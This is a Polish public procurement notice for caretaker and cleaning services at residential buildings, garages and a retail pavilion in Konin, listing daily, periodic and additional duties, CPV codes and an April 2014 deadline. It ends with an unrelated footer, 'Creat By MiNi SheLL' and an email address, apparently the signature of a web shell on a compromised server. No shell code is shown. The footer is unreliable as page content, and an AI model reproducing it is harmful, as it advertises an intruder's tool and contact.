<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Podstawowe obowiązki Wykonawcy:
1.Nadzór nad prawidłowym korzystaniem z pomieszczeń wspólnego użytku znajdujących się w obiekcie.
2.Nadzór nad sprawnym działaniem instalacji i urządzeń technicznych znajdujących się w obiekcie.
3.	Niezwłoczne informowanie Zamawiającego o złym stanie technicznym elementów małej architektury i urządzeń znajdujących się na placu zabaw.
4.Zgłaszanie Zamawiającemu zauważonych dewastacji i usterek urządzeń technicznych oraz instalacji.
5.Przestrzeganie przepisów o ochronie przeciwpożarowej, a w szczególności utrzymanie w należytym stanie korytarzy piwnicznych i klatek schodowych.
6.	Nadzór nad sprawnym działaniem wszystkich punktów świetlnych w części wspólnej budynku i przed budynkiem, wraz z wymianą żarówek w łatwo dostępnych oprawach.
7.Roznoszenie na terenie obiektu zawiadomień i wszelkiej korespondencji do mieszkańców, za potwierdzeniem odbioru.
8.Wywieszanie / zdejmowanie ogłoszeń i zawiadomień dostarczanych przez Zamawiającego.
9.Usuwanie plakatów, ogłoszeń, naklejek itp. umieszczanych przez osoby postronne bez zgody Zamawiającego.
10.Wywieszanie / zdejmowanie powierzonych flag.
11.Wykonywanie innych czynności na polecenie Zamawiającego.
12.Wykonywanie usług objętych umową we wszystkie dni robocze w godzinach ustalonych pisemnie z przedstawicielem Wykonawcy.
13. Wykonywanie usług objętych umową w niedziele, święta i inne dni wolne od pracy w szczególnych przypadkach oraz w razie wystąpienia opadów śniegu          i gołoledzi.

II. Codzienne obowiązki Wykonawcy:
1.Omiatanie całych klatek schodowych, wiatrołapów oraz zejść do piwnic.
2.Omiatanie oraz usuwanie wszelkich zanieczyszczeń z chodników, trawników, dróg wewnętrznych, parkingów i śmietników.
3.	Opróżnianie znajdujących się przy budynkach koszy na śmieci.
4.Dbanie o prawidłową segregację odpadów komunalnych (kontenery specjalne -szkło, plastik, papier) oraz właściwe i racjonalne napełnianie kontenerów.
5.W okresie zimowym odśnieżanie i posypywanie piaskiem z solą chodników, parkingów i dróg wewnętrznych (także w niedziele, święta i inne dni wolne od pracy).
6.Zgłaszanie Zamawiającemu potrzeby wywozu nieczystości stałych i rzetelne potwierdzanie ilości faktycznie opróżnionych pojemników.  
7.Kontrola prawidłowego zamknięcia wszystkich włazów dachowych, okien na klatkach schodowych, szafek energetycznych.
8.Kontrola stanu elementów przeszklonych (niezwłoczne sprzątanie rozbitego szkła w celu likwidacji zagrożenia skaleczeniem).

III. Obowiązki okresowe Wykonawcy:
1.Sprzątanie pomieszczeń gospodarczych i pomieszczeń przeznaczonych do użytku wspólnego (każdorazowo w razie potrzeby, minimum 1 raz w miesiącu).
2.Mycie klatek schodowych od wejścia, przez wiatrołap do drzwi piwnicznych (każdorazowo w razie potrzeby, minimum 1 raz w tygodniu).
3.Czyszczenie balustrad, parapetów, grzejników, skrzynek pocztowych, szafek instalacyjnych, gablot ogłoszeniowych, rurociągów oraz innego wyposażenia klatek schodowych i piwnic (każdorazowo w razie potrzeby, minimum 1 raz w tygodniu).
4.Mycie okien i drzwi (wejściowych do budynku oraz do pomieszczeń  oraz bram i szlabanów wjazdowych (4 razy w ciągu roku, tj. w miesiącach: marzec, czerwiec, wrzesień, grudzień).
5.Czyszczenie koszy w rurach spustowych wody deszczowej (4 razy w ciągu roku, tj. w miesiącach: marzec, sierpień, październik, grudzień).
6.Prace pielęgnacyjne terenów zielonych (każdorazowo w razie potrzeby):
      - koszenie trawników i wywóz skoszonej trawy,
      - podlewanie, nawożenie, odchwaszczanie, opryski,
      - cięcie pielęgnacyjne drzew i krzewów,
      - zagrabianie i sprzątanie opadłych liści,
7.	Wymiana piasku w piaskownicach (1 raz w roku, wiosną) obejmująca:
- wybranie i wywóz starego piasku z piaskownic,
- zakup i przywóz świeżego piasku oraz napełnienie piaskownic.
8.Dowóz piasku i soli do posypywania w okresie zimowym oraz zabezpieczenie zapasu piasku przed zamarzaniem.
9.Odkażanie placyków gospodarczych (każdorazowo w razie potrzeby).
10.Likwidacja drobnych usterek oraz wykonywanie prac podnoszących sprawność techniczną i estetykę nieruchomości.

IV. Obowiązki dodatkowe Wykonawcy i zalecenia Zamawiającego:
1.Wykonawca zatrudni jako Gospodarzy poszczególnych obiektów osoby  cechujące się kulturą osobistą, schludnym wyglądem oraz dbające o utrzymanie dobrych relacji  z mieszkańcami obiektów.
2.Gospodarze poszczególnych obiektów zobowiązani są do rozpoczęcia pracy rano  w godzinach 6.00 - 8.00 (w przypadku opadów śniegu lub gołoledzi, prace  należy rozpocząć niezwłocznie). 
3.Czas pracy poszczególnych Gospodarzy Wykonawca uzgodni z Zamawiającym. Aktualny wykaz osób pełniących funkcję Gospodarzy poszczególnych obiektów wraz z numerami telefonów kontaktowych oraz godzinami pracy, Wykonawca będzie przekazywał Zamawiającemu.
4.Wykonawca zapewni Gospodarzom poszczególnych obiektów środki łączności 
telefonicznej. 
Numery telefonów zostaną umieszczone na tablicach informacyjnych poszczególnych obiektów.
V. Zlecone obiekty: Dla części II

1.Budynek mieszkalny wielorodzinny (79 mieszkań + 5 lokali usługowo-handlowych) wraz z terenem przynależnym przy ul. Szpitalnej 52 w Koninie:
2.Budynki mieszkalne wielorodzinne (296 mieszkań) wraz z terenem przynależnym przy ul.Topazowej 12, 14, 16, 18, 20, 22 i 24 oraz teren zewn. przy pawilonach usł-handlowych przy ul. Topazowej 20a i 22a w Koninie:
3.Pawilon usługowo-handlowy przy Al. 1Maja 22A w Koninie:
4.Garaże (50 boksów) przy ul. Chopina w Koninie:
5.Garaże (75 boksów) przy ul. Działkowej w Koninie:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.63.00.00-2, 90.62.00.00-9, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com